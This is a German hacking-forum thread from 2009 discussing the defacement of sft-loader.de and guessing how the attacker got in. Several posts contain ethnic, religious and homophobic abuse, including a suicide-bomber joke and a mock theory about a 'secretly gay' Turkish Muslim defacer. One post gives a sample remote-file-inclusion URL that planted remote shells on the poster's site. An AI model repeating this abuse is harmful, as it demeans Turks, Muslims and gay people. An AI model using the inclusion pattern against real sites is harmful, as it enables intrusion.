sft-loader.de "gehackt"

Dieses Thema im Forum "Szene News" wurde erstellt von cable, 26. Oktober 2009 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 26. Oktober 2009
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    Hoi!

    Da haben sich so ein paar türkische Milchbubis wohl einen Spaß erlaubt.

    SFT Loader und SFT Encrypter

    Hier Screeny:
    Bild

    Habt ihr echt super gemacht. Ihr verdient echt meine Anerkennung -.-

    greez
     
  2. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    wohl nicht richtig secured.. passiert wohl
     
  3. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    so solche menschen haben einfach kein leben sry aber was hat der davon respect + toll geh arbeiten.. echt man
     
  4. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    oh lol kids@work, das hat sich gleich wieder so wie das aussieht, hatte der "haxx0r" zu wenig eier in der hose um sich in die luft zu sprengen, also hacked er mal schnell was
     
  5. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    Ihr versteht das Problem nicht:

    Der Typ ist Schwul.
    Türken und andere Moslems dürfen nicht schwul sein.

    Was macht man als "heimlicher" *******r Moslem also wenn die Kumpels ihre Tussen vernaschen:
    Genau, man "Hackt" mit Kiddiescripten und Exploits irgendwelche Webseiten während man sich eine "Boah war die Tussi in meinem Bett geil"-Geschichte ausdenkt damit die Freunde nicht merken das man Schwul ist und man sich eben nicht langweilt.


    Habt also bitte ein wenig Verständniss für dieses arme Kerlchen.


    Dj



    Dieser Beitrag kann Spuren von Sarkasmus enthalten.
    Dieser Beitrag soll weder gegen Türken/Moslems noch gegen ******* aufwiegeln! Ein jeder Mensch hat das gleiche Recht zu leben, egal wie er es lebt (außer Kinderfi**er!). Wer mir also mit "Du Nazi/Du *******nfeind" kommen will sollte in den Keller gehen und sich einen Schrubben, mir geht das nämlich am Ar**h vorbei da ich weiß das beide behauptungen nicht zutreffen.
     
  6. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    was soll das scheiß gelaber was der da hingeschrieben hat?
    ich versteh die aussage nicht, scheint recht verwirrt zu sein, der arme kerl.

    naja, sft-loader ist jetzt nicht so der verlust, aber ein affe ist es trotzdem. auch wenn es ein deutscher wäre, wäre es ein affe^^ nur um das anzufügen.

    egal, **** auf den ♂️♀️r!


    Grüße,
    $$$moq



    PS: Ich bin sicher der türkische Hackerprofi hat auch ein Screen gemacht davon um sich darauf einen zu wixen.
     
  7. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    Was mir immer wieder bei diversen defaced auffällt ist das funy quellcode bin immer wieder überrascht was FrontPage kann und scheinbar nicht kann
     
  8. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    Ich frage mich immer, was diese Leute dazu bewegt, sich einen Exploit zu schnappen und dann mit ihren "I Am Turkey and Muslim hacker"-Frontpage Seiten das Netz zu verseuchen
     
  9. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    Haha die Stellen "Ey Mohammed!" und die Englischen Stellen voller it sind echt lustig ^^ Was fürn krankes wesen
     
  10. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    Eine SQL-Injection via Joomla von einem Unterbenutzer hat ihm dies ermöglicht .. aber nur Spreading der HTML-Pages
     
  11. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    Da hatte ein lustiger Mensch wohl Langeweile...
    Einfach ned genug secured..

    Wenn er jetzt noch deutsch könnte, würden einige vllt. auch den Inhalt verstehen
    All in All = Wayne meiner Meinung nach.

    so far,
    sn00p
     
  12. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    http://www.zone-h.org/archive/defacer=frewal

    Mehr braucht man wohl nicht dazu sagen. Solche Massdefacer finde ich eigentlich gar nicht so schlecht, weil die eben nur defacen und auf eine Lücke aufmerksam machen, gibt also schlimmeres. Wobei der Text den er da hinterlässt ist natürlich schon Kiddie mäßig.
     
  13. 26. Oktober 2009
    AW: sft-loader.de "gehackt"

    mhh... naja...

    deine aussage stimmt für alle massendefacer, die ihr "können" (das darin besteht ein vorgefertigtes pythonskriptchen laufen zu lassen), nicht auf einer solchen seite wie zone-h zur schau stellen.

    die, die es machen ziehen ne menge geltungsbedürftige skriptkiddies nach sich, als besipiel nehme ich mal eine seite von mir:

    auf dieser seite lief ein skript um sourcecode zu pasten (dat wurde nur von mir und einem freund benutzt, also sooowas von unbedeutend). dann wurde eines tages bei milw0rm ein RFI offengelegt. keine 2h später war dann auch diese seite defaced und bei zone-h eingetragen. nach weiteren 1-2h ging dann die "hölle" los: nach auswertung der logs habe ich 20 remote-shells gezählt. desweiteren mehrere versuche eine remote-shell zu platzieren, die offensichtlich an der dummheit der benutzer scheiterten:
    Code:
    http://meine-domain.tld/datei.php?file=[B]http://place-your-source-of-remote-shell-here.com[/B]
    durch konsequente rechtevergabe ist nichts gravierendes passiert, aber der eigentliche gravierende angriff kam erst nachdem das skriptkiddie das defacement auf zone-h gepostet hat.
     
  14. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.